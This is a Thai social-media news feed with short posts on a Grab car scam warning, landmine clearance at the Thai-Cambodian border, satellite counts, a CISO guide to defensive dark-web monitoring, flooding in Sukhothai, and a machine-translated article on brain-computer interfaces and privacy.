    #CambodiaNoCeasefire
    #Hunsenfiredfirst
    #scambodia
    #news1
    #shorts
    Grabcarสาวสวย เล่าระทึกอุทาหรณ์เกือบถูก "ลวง" ไป "...ายตัว" (15/9/68) #Grabcar #ภัยใกล้ตัว #เรื่องจริงเตือนภัย #สาวไทยต้องระวัง #ข่าววันนี้ #News1short #ThaiTimes #TruthFromThailand #CambodiaNoCeasefire #Hunsenfiredfirst #scambodia #news1 #shorts
    0 Comments 0 Shares 305 Views 0 0 Reviews
  • TMAC กู้ระเบิดกว่า 300 ลูก ชายแดนไทย-กัมพูชา แม้หยุดยิงแล้ว แต่ยังอันตราย พบทั้งทุ่นระเบิดสังหารบุคคลและระเบิดอื่นๆ กว่า 2,000 รายการ เตือนภัยประชาชนชายแดน

    อ่านต่อ..https://news1live.com/detail/9680000088223

    #News1live #News1 #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    TMAC กู้ระเบิดกว่า 300 ลูก ชายแดนไทย-กัมพูชา แม้หยุดยิงแล้ว แต่ยังอันตราย พบทั้งทุ่นระเบิดสังหารบุคคลและระเบิดอื่นๆ กว่า 2,000 รายการ เตือนภัยประชาชนชายแดน อ่านต่อ..https://news1live.com/detail/9680000088223 #News1live #News1 #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    Sad
    2
    1 Comments 0 Shares 453 Views 0 Reviews
  • “ดาวเทียมล้นวงโคจร! สหรัฐฯ ครองแชมป์ด้วย 9,203 ดวง ขณะที่โลกเพิ่มขึ้นวันละ 7 ตัน — จาก Sputnik สู่ยุค Starlink และสงครามอวกาศ”

    ย้อนกลับไปปี 1957 เมื่อ Sputnik 1 กลายเป็นดาวเทียมดวงแรกของโลกที่โคจรรอบโลกอย่างโดดเดี่ยว — วันนี้มันคงรู้สึกเหงาไม่ออก เพราะมีวัตถุมนุษย์สร้างกว่า 45,000 ชิ้นลอยอยู่ในอวกาศ และในจำนวนนี้มีดาวเทียมที่ยังทำงานอยู่ถึง 13,727 ดวงจาก 82 ประเทศทั่วโลก

    สหรัฐอเมริกาครองตำแหน่งผู้นำแบบทิ้งห่าง ด้วยจำนวนดาวเทียมถึง 9,203 ดวง มากกว่ารัสเซียที่ตามมาเป็นอันดับสองถึง 6 เท่า ส่วนจีนมี 1,121 ดวง และสหราชอาณาจักรมี 722 ดวง โดยในปี 2024 เพียงปีเดียว มีดาวเทียมใหม่ถูกส่งขึ้นไปถึง 2,695 ดวง — เทียบกับปี 2020 ที่มีเพียง 3,371 ดวงเท่านั้น1

    ดาวเทียมเหล่านี้ไม่ได้มีไว้แค่ส่งสัญญาณทีวีหรือพยากรณ์อากาศ แต่ยังใช้ในงานที่หลากหลายอย่างไม่น่าเชื่อ เช่น การทำธุรกรรมทางการเงิน, การติดตามกระแสน้ำในมหาสมุทร, การควบคุมโครงข่ายพลังงาน, การสื่อสารทางทหาร, และแม้แต่การพาเถ้ากระดูกมนุษย์ไปโคจรรอบโลก

    ในด้านการทหาร สหรัฐฯ ก็ยังนำโด่งด้วยดาวเทียมทางทหารถึง 247 ดวง ตามด้วยจีน 157 ดวง และรัสเซีย 110 ดวง3 ดาวเทียมเหล่านี้มีบทบาทสำคัญในการสอดแนม, แจ้งเตือนการยิงขีปนาวุธ, สื่อสารภาคสนาม, และแม้แต่การป้องกันไซเบอร์

    แม้จะมีประโยชน์มหาศาล แต่การเพิ่มขึ้นของดาวเทียมก็ทำให้เกิดปัญหา “ขยะอวกาศ” ที่กำลังทวีความรุนแรง โดยมีวัตถุที่ถูกติดตามแล้วกว่า 32,750 ชิ้น และมีฮาร์ดแวร์ใหม่ถูกส่งขึ้นไปถึง 7 ตันต่อวัน — ทำให้วงโคจรของโลกกลายเป็นพื้นที่แออัดที่อาจเกิดอุบัติเหตุได้ทุกเมื่อ

    สถานการณ์ดาวเทียมในปัจจุบัน
    มีดาวเทียมที่ยังทำงานอยู่ 13,727 ดวง จาก 82 ประเทศและองค์กร
    สหรัฐฯ มีมากที่สุดที่ 9,203 ดวง ตามด้วยรัสเซีย 1,471 ดวง และจีน 1,121 ดวง1
    ปี 2024 มีดาวเทียมใหม่เพิ่มขึ้น 2,695 ดวง เทียบกับ 3,371 ดวงในปี 2020

    การใช้งานดาวเทียม
    ใช้ในระบบนำทาง, อินเทอร์เน็ต, การพยากรณ์อากาศ, การสื่อสาร
    ใช้ในธุรกรรมการเงิน เช่น การส่งข้อมูลบัตรเครดิตผ่านดาวเทียม
    ใช้ในงานวิจัย เช่น กล้องโทรทรรศน์อวกาศ Hubble และการติดตามมหาสมุทร
    ใช้ในพิธีกรรม เช่น การนำเถ้ากระดูกมนุษย์ไปโคจรรอบโลก

    ดาวเทียมทางทหาร
    สหรัฐฯ มีดาวเทียมทางทหาร 247 ดวง มากที่สุดในโลก3
    จีนมี 157 ดวง, รัสเซีย 110 ดวง, ฝรั่งเศส 17 ดวง, อิสราเอล 12 ดวง
    ใช้ในการสอดแนม, แจ้งเตือนภัย, GPS, และการสื่อสารภาคสนาม

    ข้อมูลเสริมจากภายนอก
    ดาวเทียมของสหรัฐฯ มีทั้งเชิงพาณิชย์, วิจัย, และทหาร รวมกว่า 11,655 ดวง
    ระบบดาวเทียมเช่น Starlink ของ Elon Musk มีบทบาทสำคัญในการให้บริการอินเทอร์เน็ตทั่วโลก
    ระบบ SATCOM ถูกใช้ในสงคราม เช่น Operation Desert Storm ปี 19912
    ประเทศอื่นที่มีดาวเทียมจำนวนมาก ได้แก่ รัสเซีย (7,187 ดวง), จีน (5,330 ดวง), สหราชอาณาจักร (735 ดวง), ฝรั่งเศส (604 ดวง)

    คำเตือนจากการเพิ่มขึ้นของดาวเทียม
    ขยะอวกาศมีมากกว่า 32,750 ชิ้นที่ถูกติดตามแล้ว — เสี่ยงต่อการชนกันในวงโคจร
    มีฮาร์ดแวร์ใหม่ถูกส่งขึ้นไปถึง 7 ตันต่อวัน — เพิ่มความแออัดในอวกาศ
    การควบคุมการปล่อยดาวเทียมยังไม่มีมาตรฐานสากลที่ชัดเจน
    ดาวเทียมทางทหารอาจถูกใช้ในสงครามไซเบอร์หรือการสอดแนมประชาชน
    หากไม่มีการจัดการขยะอวกาศอย่างจริงจัง อาจเกิด “Kessler Syndrome” ที่ทำให้วงโคจรใช้งานไม่ได้

    https://www.slashgear.com/1961880/how-many-satellites-are-in-space-which-country-has-the-most/
    🛰️ “ดาวเทียมล้นวงโคจร! สหรัฐฯ ครองแชมป์ด้วย 9,203 ดวง ขณะที่โลกเพิ่มขึ้นวันละ 7 ตัน — จาก Sputnik สู่ยุค Starlink และสงครามอวกาศ” ย้อนกลับไปปี 1957 เมื่อ Sputnik 1 กลายเป็นดาวเทียมดวงแรกของโลกที่โคจรรอบโลกอย่างโดดเดี่ยว — วันนี้มันคงรู้สึกเหงาไม่ออก เพราะมีวัตถุมนุษย์สร้างกว่า 45,000 ชิ้นลอยอยู่ในอวกาศ และในจำนวนนี้มีดาวเทียมที่ยังทำงานอยู่ถึง 13,727 ดวงจาก 82 ประเทศทั่วโลก สหรัฐอเมริกาครองตำแหน่งผู้นำแบบทิ้งห่าง ด้วยจำนวนดาวเทียมถึง 9,203 ดวง มากกว่ารัสเซียที่ตามมาเป็นอันดับสองถึง 6 เท่า ส่วนจีนมี 1,121 ดวง และสหราชอาณาจักรมี 722 ดวง โดยในปี 2024 เพียงปีเดียว มีดาวเทียมใหม่ถูกส่งขึ้นไปถึง 2,695 ดวง — เทียบกับปี 2020 ที่มีเพียง 3,371 ดวงเท่านั้น1 ดาวเทียมเหล่านี้ไม่ได้มีไว้แค่ส่งสัญญาณทีวีหรือพยากรณ์อากาศ แต่ยังใช้ในงานที่หลากหลายอย่างไม่น่าเชื่อ เช่น การทำธุรกรรมทางการเงิน, การติดตามกระแสน้ำในมหาสมุทร, การควบคุมโครงข่ายพลังงาน, การสื่อสารทางทหาร, และแม้แต่การพาเถ้ากระดูกมนุษย์ไปโคจรรอบโลก ในด้านการทหาร สหรัฐฯ ก็ยังนำโด่งด้วยดาวเทียมทางทหารถึง 247 ดวง ตามด้วยจีน 157 ดวง และรัสเซีย 110 ดวง3 ดาวเทียมเหล่านี้มีบทบาทสำคัญในการสอดแนม, แจ้งเตือนการยิงขีปนาวุธ, สื่อสารภาคสนาม, และแม้แต่การป้องกันไซเบอร์ แม้จะมีประโยชน์มหาศาล แต่การเพิ่มขึ้นของดาวเทียมก็ทำให้เกิดปัญหา “ขยะอวกาศ” ที่กำลังทวีความรุนแรง โดยมีวัตถุที่ถูกติดตามแล้วกว่า 32,750 ชิ้น และมีฮาร์ดแวร์ใหม่ถูกส่งขึ้นไปถึง 7 ตันต่อวัน — ทำให้วงโคจรของโลกกลายเป็นพื้นที่แออัดที่อาจเกิดอุบัติเหตุได้ทุกเมื่อ ✅ สถานการณ์ดาวเทียมในปัจจุบัน ➡️ มีดาวเทียมที่ยังทำงานอยู่ 13,727 ดวง จาก 82 ประเทศและองค์กร ➡️ สหรัฐฯ มีมากที่สุดที่ 9,203 ดวง ตามด้วยรัสเซีย 1,471 ดวง และจีน 1,121 ดวง1 ➡️ ปี 2024 มีดาวเทียมใหม่เพิ่มขึ้น 2,695 ดวง เทียบกับ 3,371 ดวงในปี 2020 ✅ การใช้งานดาวเทียม ➡️ ใช้ในระบบนำทาง, อินเทอร์เน็ต, การพยากรณ์อากาศ, การสื่อสาร ➡️ ใช้ในธุรกรรมการเงิน เช่น การส่งข้อมูลบัตรเครดิตผ่านดาวเทียม ➡️ ใช้ในงานวิจัย เช่น กล้องโทรทรรศน์อวกาศ Hubble และการติดตามมหาสมุทร ➡️ ใช้ในพิธีกรรม เช่น การนำเถ้ากระดูกมนุษย์ไปโคจรรอบโลก ✅ ดาวเทียมทางทหาร ➡️ สหรัฐฯ มีดาวเทียมทางทหาร 247 ดวง มากที่สุดในโลก3 ➡️ จีนมี 157 ดวง, รัสเซีย 110 ดวง, ฝรั่งเศส 17 ดวง, อิสราเอล 12 ดวง ➡️ ใช้ในการสอดแนม, แจ้งเตือนภัย, GPS, และการสื่อสารภาคสนาม ✅ ข้อมูลเสริมจากภายนอก ➡️ ดาวเทียมของสหรัฐฯ มีทั้งเชิงพาณิชย์, วิจัย, และทหาร รวมกว่า 11,655 ดวง ➡️ ระบบดาวเทียมเช่น Starlink ของ Elon Musk มีบทบาทสำคัญในการให้บริการอินเทอร์เน็ตทั่วโลก ➡️ ระบบ SATCOM ถูกใช้ในสงคราม เช่น Operation Desert Storm ปี 19912 ➡️ ประเทศอื่นที่มีดาวเทียมจำนวนมาก ได้แก่ รัสเซีย (7,187 ดวง), จีน (5,330 ดวง), สหราชอาณาจักร (735 ดวง), ฝรั่งเศส (604 ดวง) ‼️ คำเตือนจากการเพิ่มขึ้นของดาวเทียม ⛔ ขยะอวกาศมีมากกว่า 32,750 ชิ้นที่ถูกติดตามแล้ว — เสี่ยงต่อการชนกันในวงโคจร ⛔ มีฮาร์ดแวร์ใหม่ถูกส่งขึ้นไปถึง 7 ตันต่อวัน — เพิ่มความแออัดในอวกาศ ⛔ การควบคุมการปล่อยดาวเทียมยังไม่มีมาตรฐานสากลที่ชัดเจน ⛔ ดาวเทียมทางทหารอาจถูกใช้ในสงครามไซเบอร์หรือการสอดแนมประชาชน ⛔ หากไม่มีการจัดการขยะอวกาศอย่างจริงจัง อาจเกิด “Kessler Syndrome” ที่ทำให้วงโคจรใช้งานไม่ได้ https://www.slashgear.com/1961880/how-many-satellites-are-in-space-which-country-has-the-most/
    WWW.SLASHGEAR.COM
    How Many Satellites Are In Space And Which Country Has The Most? - SlashGear
    Around 13,700 satellites orbit Earth, and with over 9,000, the U.S. owns the most. It's way ahead of any other nation, including Russia, China, and the U.K.
    0 Comments 0 Shares 369 Views 0 Reviews
  • อย.เตือนภัยผู้บริโภค
    ระวังแป้งปนเปื้อน
    ทาแล้วอาจอักเสบจนหลังหัก
    ต้องบินไปหาหมอกระดูกถึงดูไบ
    #คิงส์โพธิ์แดง
    อย.เตือนภัยผู้บริโภค ระวังแป้งปนเปื้อน ทาแล้วอาจอักเสบจนหลังหัก ต้องบินไปหาหมอกระดูกถึงดูไบ #คิงส์โพธิ์แดง
    0 Comments 0 Shares 336 Views 0 Reviews
  • เรื่องเล่าจาก Dark Web: เมื่อการเฝ้าระวังในเงามืดกลายเป็นเกราะป้องกันองค์กรก่อนภัยจะมาถึง

    หลายองค์กรยังมอง Dark Web ว่าเป็นพื้นที่ของอาชญากรรมไซเบอร์ที่ไม่ควรเข้าไปยุ่ง แต่ในความเป็นจริง มันคือ “เรดาร์ลับ” ที่สามารถแจ้งเตือนภัยล่วงหน้าได้ก่อนที่การโจมตีจะเกิดขึ้นจริง ไม่ว่าจะเป็นการรั่วไหลของ credentials, การขายสิทธิ์เข้าถึงระบบ, หรือการวางแผน ransomware

    ผู้เชี่ยวชาญจากหลายบริษัท เช่น Nightwing, Picus Security, ISG และ Cyberproof ต่างยืนยันว่า Dark Web คือแหล่งข้อมูลที่มีค่า—ถ้าเรารู้ว่าจะดูอะไร และจะใช้ข้อมูลนั้นอย่างไร เช่น การตรวจพบ stealer logs, การพูดถึงแบรนด์ขององค์กร, หรือการขายสิทธิ์ RDP/VPN โดย initial access brokers (IABs)

    การเฝ้าระวัง Dark Web ไม่ใช่แค่การ “ดูว่ามีข้อมูลหลุดหรือไม่” แต่ต้องเชื่อมโยงกับระบบภายใน เช่น SIEM, XDR, หรือระบบ identity เพื่อให้สามารถตอบสนองได้ทันทีเมื่อพบ session token หรือ admin credential ที่ถูกขโมย

    เครื่องมือที่นิยมใช้ ได้แก่ SpyCloud ซึ่งเน้นการตรวจจับ credentials ที่หลุดแบบอัตโนมัติ และ DarkOwl ที่เน้นการวิเคราะห์เชิงกลยุทธ์ โดยมี search engine สำหรับ Dark Web ที่สามารถกรองตามประเภทข้อมูล, เวลา, และแหล่งที่มา

    นอกจากนี้ ยังมีเทคนิคเชิงรุก เช่น honeypots และ canary tokens ที่ใช้ล่อให้แฮกเกอร์เปิดเผยตัว และการเข้าร่วม ISACs หรือ CERTs เพื่อแลกเปลี่ยนข้อมูลภัยคุกคามในอุตสาหกรรมเดียวกัน

    เหตุผลที่ควรเฝ้าระวัง Dark Web
    เป็นระบบแจ้งเตือนภัยล่วงหน้าเมื่อมีข้อมูลหลุดหรือถูกวางเป้าหมาย
    ช่วยให้ทีม security รู้ว่ากลุ่ม ransomware กำลังเล็งอุตสาหกรรมใด
    สามารถใช้ข้อมูลเพื่อปรับ playbook และทำ adversarial simulation

    สัญญาณที่ควรจับตา
    stealer logs, brand mentions, การขายสิทธิ์ RDP/VPN โดย IABs
    การพูดถึงซอฟต์แวร์หรือระบบที่องค์กรใช้อยู่ เช่น CRM, SSO, cloud
    การโพสต์รับสมัคร affiliate ที่เจาะจงอุตสาหกรรม เช่น SaaS หรือ healthcare

    เครื่องมือและแพลตฟอร์มที่ใช้
    SpyCloud: ตรวจจับ credentials, cookies, tokens ที่หลุดแบบอัตโนมัติ
    DarkOwl: วิเคราะห์เชิงกลยุทธ์ มี search engine สำหรับ Dark Web
    Flashpoint, Recorded Future: ใช้สำหรับ threat intelligence และการแจ้งเตือน

    เทคนิคเสริมเพื่อเพิ่มการตรวจจับ
    honeypots และ canary tokens สำหรับล่อแฮกเกอร์และตรวจจับ insider threat
    การเข้าร่วม ISACs และ CERTs เพื่อแลกเปลี่ยนข้อมูลภัยคุกคาม
    การตั้งค่า monitoring สำหรับ domain, IP, username บน marketplace และ forum

    การเชื่อมโยงข้อมูลภายนอกกับระบบภายใน
    cross-reference กับ authentication logs, identity changes, และ anomalous behavior
    ใช้ข้อมูลจาก Dark Web เพื่อ trigger investigation, revoke access, isolate services
    พัฒนา incident response playbook ที่เชื่อมโยงกับ threat intelligence

    https://www.csoonline.com/article/4046242/a-cisos-guide-to-monitoring-the-dark-web.html
    🎙️ เรื่องเล่าจาก Dark Web: เมื่อการเฝ้าระวังในเงามืดกลายเป็นเกราะป้องกันองค์กรก่อนภัยจะมาถึง หลายองค์กรยังมอง Dark Web ว่าเป็นพื้นที่ของอาชญากรรมไซเบอร์ที่ไม่ควรเข้าไปยุ่ง แต่ในความเป็นจริง มันคือ “เรดาร์ลับ” ที่สามารถแจ้งเตือนภัยล่วงหน้าได้ก่อนที่การโจมตีจะเกิดขึ้นจริง ไม่ว่าจะเป็นการรั่วไหลของ credentials, การขายสิทธิ์เข้าถึงระบบ, หรือการวางแผน ransomware ผู้เชี่ยวชาญจากหลายบริษัท เช่น Nightwing, Picus Security, ISG และ Cyberproof ต่างยืนยันว่า Dark Web คือแหล่งข้อมูลที่มีค่า—ถ้าเรารู้ว่าจะดูอะไร และจะใช้ข้อมูลนั้นอย่างไร เช่น การตรวจพบ stealer logs, การพูดถึงแบรนด์ขององค์กร, หรือการขายสิทธิ์ RDP/VPN โดย initial access brokers (IABs) การเฝ้าระวัง Dark Web ไม่ใช่แค่การ “ดูว่ามีข้อมูลหลุดหรือไม่” แต่ต้องเชื่อมโยงกับระบบภายใน เช่น SIEM, XDR, หรือระบบ identity เพื่อให้สามารถตอบสนองได้ทันทีเมื่อพบ session token หรือ admin credential ที่ถูกขโมย เครื่องมือที่นิยมใช้ ได้แก่ SpyCloud ซึ่งเน้นการตรวจจับ credentials ที่หลุดแบบอัตโนมัติ และ DarkOwl ที่เน้นการวิเคราะห์เชิงกลยุทธ์ โดยมี search engine สำหรับ Dark Web ที่สามารถกรองตามประเภทข้อมูล, เวลา, และแหล่งที่มา นอกจากนี้ ยังมีเทคนิคเชิงรุก เช่น honeypots และ canary tokens ที่ใช้ล่อให้แฮกเกอร์เปิดเผยตัว และการเข้าร่วม ISACs หรือ CERTs เพื่อแลกเปลี่ยนข้อมูลภัยคุกคามในอุตสาหกรรมเดียวกัน ✅ เหตุผลที่ควรเฝ้าระวัง Dark Web ➡️ เป็นระบบแจ้งเตือนภัยล่วงหน้าเมื่อมีข้อมูลหลุดหรือถูกวางเป้าหมาย ➡️ ช่วยให้ทีม security รู้ว่ากลุ่ม ransomware กำลังเล็งอุตสาหกรรมใด ➡️ สามารถใช้ข้อมูลเพื่อปรับ playbook และทำ adversarial simulation ✅ สัญญาณที่ควรจับตา ➡️ stealer logs, brand mentions, การขายสิทธิ์ RDP/VPN โดย IABs ➡️ การพูดถึงซอฟต์แวร์หรือระบบที่องค์กรใช้อยู่ เช่น CRM, SSO, cloud ➡️ การโพสต์รับสมัคร affiliate ที่เจาะจงอุตสาหกรรม เช่น SaaS หรือ healthcare ✅ เครื่องมือและแพลตฟอร์มที่ใช้ ➡️ SpyCloud: ตรวจจับ credentials, cookies, tokens ที่หลุดแบบอัตโนมัติ ➡️ DarkOwl: วิเคราะห์เชิงกลยุทธ์ มี search engine สำหรับ Dark Web ➡️ Flashpoint, Recorded Future: ใช้สำหรับ threat intelligence และการแจ้งเตือน ✅ เทคนิคเสริมเพื่อเพิ่มการตรวจจับ ➡️ honeypots และ canary tokens สำหรับล่อแฮกเกอร์และตรวจจับ insider threat ➡️ การเข้าร่วม ISACs และ CERTs เพื่อแลกเปลี่ยนข้อมูลภัยคุกคาม ➡️ การตั้งค่า monitoring สำหรับ domain, IP, username บน marketplace และ forum ✅ การเชื่อมโยงข้อมูลภายนอกกับระบบภายใน ➡️ cross-reference กับ authentication logs, identity changes, และ anomalous behavior ➡️ ใช้ข้อมูลจาก Dark Web เพื่อ trigger investigation, revoke access, isolate services ➡️ พัฒนา incident response playbook ที่เชื่อมโยงกับ threat intelligence https://www.csoonline.com/article/4046242/a-cisos-guide-to-monitoring-the-dark-web.html
    WWW.CSOONLINE.COM
    A CISO’s guide to monitoring the dark web
    From leaked credentials to ransomware plans, the dark web is full of early warning signs — if you know where and how to look. Here’s how security leaders can monitor these hidden spaces and act before an attack hits.
    0 Comments 0 Shares 365 Views 0 Reviews
  • น้ำยมทะลักท่วมตัวเมืองสุโขทัยแล้ว..ปภ.แจ้งเตือนภัยขั้นรุนแรง บิ๊กแบ็กพัง มวลน้ำทะลักพรวดท่วมชุมชนคูหาสุวรรณ

    อ่านต่อ..https://news1live.com/detail/9680000082034

    #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    น้ำยมทะลักท่วมตัวเมืองสุโขทัยแล้ว..ปภ.แจ้งเตือนภัยขั้นรุนแรง บิ๊กแบ็กพัง มวลน้ำทะลักพรวดท่วมชุมชนคูหาสุวรรณ อ่านต่อ..https://news1live.com/detail/9680000082034 #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    Sad
    4
    0 Comments 0 Shares 475 Views 0 Reviews
  • เตือนภัยวัยรุ่น อย่าเห็นแก่เงินจนหลุดไปวงจรนี้..!!! (27/8/68)

    #TruthFromThailand
    #เตือนภัยวัยรุ่น
    #ภัยสังคม
    #ThaiTimes
    #news1
    #shorts
    #ข่าวด่วน
    #scambodia
    #CambodianDeception
    #อาชญากรรมออนไลน์
    #ThailandYouth
    #ThailandPolitics
    เตือนภัยวัยรุ่น อย่าเห็นแก่เงินจนหลุดไปวงจรนี้..!!! (27/8/68) #TruthFromThailand #เตือนภัยวัยรุ่น #ภัยสังคม #ThaiTimes #news1 #shorts #ข่าวด่วน #scambodia #CambodianDeception #อาชญากรรมออนไลน์ #ThailandYouth #ThailandPolitics
    0 Comments 0 Shares 356 Views 0 0 Reviews

  • เทคโนโลยีขนาดใหญ่วางแผนที่จะใช้ชิปสมองเพื่ออ่านผู้ใช้’ ความคิด: การศึกษา

    25 สิงหาคม 2568

    Big Tech กําลังวางแผนที่จะปรับใช้ชิปสมองที่สามารถอ่านความคิดของผู้ใช้’ ตามการศึกษาใหม่ของมหาวิทยาลัยสแตนฟอร์ดเกี่ยวกับการปลูกถ่ายระบบประสาทหรือที่เรียกว่าอินเทอร์เฟซคอมพิวเตอร์สมอง (BCI) ซึ่งอาจเปิดเผยความลับภายในสุดในขณะที่ปลอมตัวเป็นตัวช่วยสําหรับบุคคลที่เป็นอัมพาตในการ สื่อสาร

    ตีพิมพ์ในวารสารการแพทย์ เซลล์การวิจัยแสดงให้เห็นว่าอุปกรณ์เหล่านี้ถอดรหัสสัญญาณสมองเพื่อสร้างคําพูดสังเคราะห์ด้วยความเร็วที่ไม่เคยมีมาก่อนและความพยายามเพียงเล็กน้อย ทําให้เกิดสัญญาณเตือนเกี่ยวกับการบุกรุกความเป็นส่วนตัวในขณะที่บริษัทอย่าง Neuralink ผลักดันให้มีการนําไปใช้อย่างกว้างขวาง ในขณะที่ผู้เสนอเสนอผลประโยชน์สําหรับผู้พิการ นักวิจารณ์เตือนว่าการบูรณาการที่ไม่ได้รับการตรวจสอบอาจทําให้ยักษ์ใหญ่ด้านเทคโนโลยีสามารถเก็บเกี่ยวข้อมูลประสาทเพื่อการเฝ้าระวัง การจัดการ หรือผลกําไร โดยเปลี่ยนการรับรู้ส่วนบุคคลให้เป็นทรัพยากรที่เป็นสินค้าโดยไม่ได้รับความยินยอม

    ความทันสมัย.ข่าวสาร รายงาน: BCI ทํางานโดยใช้อาร์เรย์อิเล็กโทรดขนาดเล็กเพื่อตรวจสอบกิจกรรมในเยื่อหุ้มสมองสั่งการของสมอง, ภูมิภาคที่ควบคุมกล้ามเนื้อที่เกี่ยวข้องกับการพูด จนถึงขณะนี้ เทคโนโลยีนี้อาศัยสัญญาณจากบุคคลที่เป็นอัมพาตที่พยายามพูดอย่างแข็งขัน อย่างไรก็ตาม ทีมงานสแตนฟอร์ดค้นพบว่าแม้แต่คําพูดในจินตนาการก็ยังสร้างสัญญาณที่คล้ายกันในเยื่อหุ้มสมองสั่งการ แม้ว่าจะอ่อนแอกว่าก็ตาม ด้วยความช่วยเหลือของปัญญาประดิษฐ์, พวกเขาแปลสัญญาณจาง ๆ เหล่านั้นเป็นคําที่มีความแม่นยําสูงสุด 74% จากคําศัพท์ 125,000 คํา

    “เรากําลังบันทึกสัญญาณขณะที่พวกเขากําลังพยายามพูดและแปลสัญญาณประสาทเหล่านั้นเป็นคําที่พวกเขาพยายามจะพูด ” erin Kunz นักวิจัยหลังปริญญาเอกจาก Neural Prosthetics Translational Laboratory ของ Stanford กล่าว

    แต่การก้าวกระโดดทางเทคโนโลยีนี้ทําให้เกิดธงแดงในหมู่นักวิจารณ์ที่เตือนถึงอนาคตดิสโทเปียที่ความคิดส่วนตัวของคุณอาจถูกเปิดเผย

    Nita Farahany ศาสตราจารย์ด้านกฎหมายและปรัชญาของมหาวิทยาลัย Duke และผู้เขียน การต่อสู้เพื่อสมองของคุณ, ส่งเสียงสัญญาณเตือนภัยบอก เอ็นพีอาร์, “ยิ่งเราผลักดันงานวิจัยนี้ไปข้างหน้า สมองของเราก็จะโปร่งใสมากขึ้นเท่านั้น”

    ฟาราฮานีแสดงความกังวลว่า บริษัทยักษ์ใหญ่ด้านเทคโนโลยีอย่าง Apple, Google และ Meta สามารถใช้ประโยชน์จาก BCI เพื่อเข้าถึงจิตใจของผู้บริโภคโดยไม่ได้รับความยินยอม โดยเรียกร้องให้มีการป้องกัน เช่น รหัสผ่าน เพื่อปกป้องความคิดที่มีจุดมุ่งหมายเพื่อให้เป็นส่วนตัว

    “เราต้องตระหนักว่ายุคใหม่ของความโปร่งใสของสมองนี้เป็นขอบเขตใหม่สําหรับเราจริงๆ,” Farahany กล่าว

    ในขณะที่โลกจับจ้องไปที่ปัญญาประดิษฐ์ผู้หวดที่หนักที่สุดในอุตสาหกรรมเทคโนโลยีบางคนกําลังทุ่มเงินหลายพันล้านให้กับ BCI Elon Musk ชายที่ร่ํารวยที่สุดในโลกได้ระดมทุน 1.2 พันล้านดอลลาร์สําหรับกิจการ Neuralink ของเขาซึ่งขณะนี้กําลังดําเนินการทดลองทางคลินิกร่วมกับสถาบันชั้นนําเช่น Barrow Neurological Institute, The Miami Project to Cure Paralysis และ Cleveland Clinic Abu Dhabi

    ตอนนี้ยักษ์ใหญ่ด้านเทคโนโลยีอีกคนกําลังเข้าสู่การต่อสู้

    Sam Altman ผู้ร่วมก่อตั้ง OpenAI กําลังเปิดตัว Merge Labs เพื่อท้าทาย Neuralink ของ Musk Merge Labs ได้รับการสนับสนุนจากบริษัทร่วมทุนของ OpenAI และมีมูลค่า 850 ล้านดอลลาร์ โดยกําลังมองหาเงินทุน 250 ล้านดอลลาร์ ไฟแนนเชียลไทมส์● แม้ว่าอัลท์แมนจะทําหน้าที่เป็นผู้ร่วมก่อตั้งร่วมกับอเล็กซ์ บลาเนียในโครงการสแกนม่านตาโลก แต่แหล่งข่าวระบุว่าเขาจะไม่รับบทบาทปฏิบัติการ



    เทคโนโลยีขนาดใหญ่วางแผนที่จะใช้ชิปสมองเพื่ออ่านผู้ใช้’ ความคิด: การศึกษา 25 สิงหาคม 2568 Big Tech กําลังวางแผนที่จะปรับใช้ชิปสมองที่สามารถอ่านความคิดของผู้ใช้’ ตามการศึกษาใหม่ของมหาวิทยาลัยสแตนฟอร์ดเกี่ยวกับการปลูกถ่ายระบบประสาทหรือที่เรียกว่าอินเทอร์เฟซคอมพิวเตอร์สมอง (BCI) ซึ่งอาจเปิดเผยความลับภายในสุดในขณะที่ปลอมตัวเป็นตัวช่วยสําหรับบุคคลที่เป็นอัมพาตในการ สื่อสาร ตีพิมพ์ในวารสารการแพทย์ เซลล์การวิจัยแสดงให้เห็นว่าอุปกรณ์เหล่านี้ถอดรหัสสัญญาณสมองเพื่อสร้างคําพูดสังเคราะห์ด้วยความเร็วที่ไม่เคยมีมาก่อนและความพยายามเพียงเล็กน้อย ทําให้เกิดสัญญาณเตือนเกี่ยวกับการบุกรุกความเป็นส่วนตัวในขณะที่บริษัทอย่าง Neuralink ผลักดันให้มีการนําไปใช้อย่างกว้างขวาง ในขณะที่ผู้เสนอเสนอผลประโยชน์สําหรับผู้พิการ นักวิจารณ์เตือนว่าการบูรณาการที่ไม่ได้รับการตรวจสอบอาจทําให้ยักษ์ใหญ่ด้านเทคโนโลยีสามารถเก็บเกี่ยวข้อมูลประสาทเพื่อการเฝ้าระวัง การจัดการ หรือผลกําไร โดยเปลี่ยนการรับรู้ส่วนบุคคลให้เป็นทรัพยากรที่เป็นสินค้าโดยไม่ได้รับความยินยอม ความทันสมัย.ข่าวสาร รายงาน: BCI ทํางานโดยใช้อาร์เรย์อิเล็กโทรดขนาดเล็กเพื่อตรวจสอบกิจกรรมในเยื่อหุ้มสมองสั่งการของสมอง, ภูมิภาคที่ควบคุมกล้ามเนื้อที่เกี่ยวข้องกับการพูด จนถึงขณะนี้ เทคโนโลยีนี้อาศัยสัญญาณจากบุคคลที่เป็นอัมพาตที่พยายามพูดอย่างแข็งขัน อย่างไรก็ตาม ทีมงานสแตนฟอร์ดค้นพบว่าแม้แต่คําพูดในจินตนาการก็ยังสร้างสัญญาณที่คล้ายกันในเยื่อหุ้มสมองสั่งการ แม้ว่าจะอ่อนแอกว่าก็ตาม ด้วยความช่วยเหลือของปัญญาประดิษฐ์, พวกเขาแปลสัญญาณจาง ๆ เหล่านั้นเป็นคําที่มีความแม่นยําสูงสุด 74% จากคําศัพท์ 125,000 คํา 